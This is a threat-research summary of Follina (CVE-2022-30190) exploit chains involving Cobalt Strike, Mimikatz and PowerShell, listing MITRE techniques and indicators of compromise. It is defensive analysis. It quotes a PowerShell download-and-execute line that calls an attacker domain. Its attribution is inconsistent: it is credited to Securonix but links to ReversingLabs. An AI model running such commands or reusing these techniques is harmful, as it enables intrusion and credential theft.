Threat Research

Threat analysis: Follina exploit fuels ‘live-off-the-land’ attacks

Securonix

Two-sentence summary: An in-depth analysis shows how the Follina exploit (CVE-2022-30190) is weaponized to achieve remote code execution via MSDT and to enable persistent, live-off-the-land attacker activity using native Windows tools. The report details three in-the-wild payload chains leveraging Cobalt Strike, Mimikatz, and PowerShell to persist, escalate, and exfiltrate data while evading security monitoring. #Follina #MSDT #CobaltStrike #Mimikatz #PowerShell #WebDAV #CVE-2022-30190

Keypoints

  • The Follina vulnerability (CVE-2022-30190) enables remote code execution through the MSDT protocol handler when invoked from Office applications.
  • Researchers analyzed three in-the-wild campaigns that use Follina to deliver persistence and exploitation tools, including Cobalt Strike and Mimikatz, often via PowerShell scripts.
  • Exploit Chain 1 shows a Cobalt Strike beacon hosted on a WebDAV/remote share, with lateral movement aided by the net use command and a WebDAV/SMB-based delivery approach.
  • Exploit Chain 2 uses PowerShell-based payloads and Mimikatz to harvest credentials, exfiltrate data, and persist via a scheduled task (Enable-ScheduledTask).
  • Exploit Chain 3 describes an unknown backdoor that uses rundll32.exe and pcwutl.dll to load a payload and connect to a remote host, highlighting variability in payload delivery.
  • Common evasion themes include direct syscalls to evade API monitoring, Base64-encoded payloads, and DotNET/PowerShell-based loaders designed to bypass detections.
  • Rapid patching of CVE-2022-30190 and monitoring of specific IOCs (hashes, domains, and IPs) are recommended to detect and disrupt these campaigns.

MITRE Techniques

  • [T1203] Exploitation for Client Execution – The Follina vulnerability is exploited when MSDT is invoked via a URL protocol from a document, allowing arbitrary code execution. “ms-msdt, the Microsoft Support Diagnostic Tool (MSDT) protocol handler, passing a list of options.”
  • [T1566.001] Phishing – Delivery via phishing documents and active campaigns leveraging the Follina exploit. “Researchers discovered the Follina exploit being used in phishing documents and active campaigns.”
  • [T1059.001] PowerShell – PowerShell scripts used to obtain persistent access and harvest data and credentials from victim networks. “The payloads delivered via this exploit chain were PowerShell scripts used to obtain persistent access and harvest data and credentials.”
  • [T1053.005] Scheduled Task – Persistence via scheduled tasks (Enable-ScheduledTask) and a named task. “Scheduled Task using the PowerShell commandlet Enable-ScheduledTask and the task name MicrosoftEdgeUpdateTaskMaEnglishAPUAL.”
  • [T1021.001] SMB/Windows Admin Shares – Use of net use to mount a remote share and execute the payload there. “The use of the ‘net use’ command with a username and password to execute the payload on a mounted network share.”
  • [T1041] Exfiltration Over C2 Channel – Data exfiltration to the C2 server, including registry hives and other credentials. “Exporting … registry hives as .zip files and then uploading them to the Command and Control (C2) server.”
  • [T1055] Process Injection – The loader injects shellcode into a process and uses a Cobalt Strike beacon. “injects the decrypted shellcode for a Cobalt Strike beacon.”
  • [T1003.001] Credential Dumping – Mimikatz usage to harvest credentials from memory/credentials stores. “Invoke-Mimikatz script used to harvest credentials…”
  • [T1087] Account Discovery – Discovery of user accounts, groups and administrators using WMIC. “Enumerating user accounts, groups and administrators using WMIC.”
  • [T1105] Ingress Tool Transfer – Downloading and executing payloads from remote servers (e.g., seller-notification.live, Zgfbe234dg). “powershell -nop -c … DownloadString(‘https://seller-notification.live/Zgfbe234dg’)”

Indicators of Compromise

  • [Filesystem] context – 83fde764f70378b4b0610d87e86faac6dc5bc54b (Word Document), and 6e9e90431e5e660071b683d121ad887d3726a4a0 (Embedded XML File), and 7ed97610cdee3c69be2961543ce619485b680572 (HTML Page), and other N items
  • [Filename] context – osdupdate.exe, wstmp.exe, and pcwutl.dll (Payload-related artifacts seen across chains)
  • [Network] context – files.attend-doha-expo.com, 5.206.224.233, telecomly.info, seller-notification.live, 65.20.75.158, t1bet.net, 45.77.45.222:110 (example indicators; multiple items listed in article)

Read more: https://blog.reversinglabs.com/blog/threat-analysis-follina-exploit-powers-live-off-the-land-attacks